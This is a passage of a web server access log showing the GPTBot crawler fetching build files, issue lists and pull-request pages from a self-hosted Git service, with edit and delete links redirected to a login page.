-[17/Feb/2026:18:48:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11723] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11302] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15512] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11310] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12241] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11402] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16676] [Gzip 12.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9870] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11423] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 11207] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" -[17/Feb/2026:18:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:48:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10130] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fdist%2fPostgresPatrol.exe" [Client 74.7.227.38] [Length 19793] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:18:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=all&type=all" [Client 74.7.227.38] [Length 10097] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:18:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13476] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" -[17/Feb/2026:18:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10257] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10086] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10088] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10266] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr 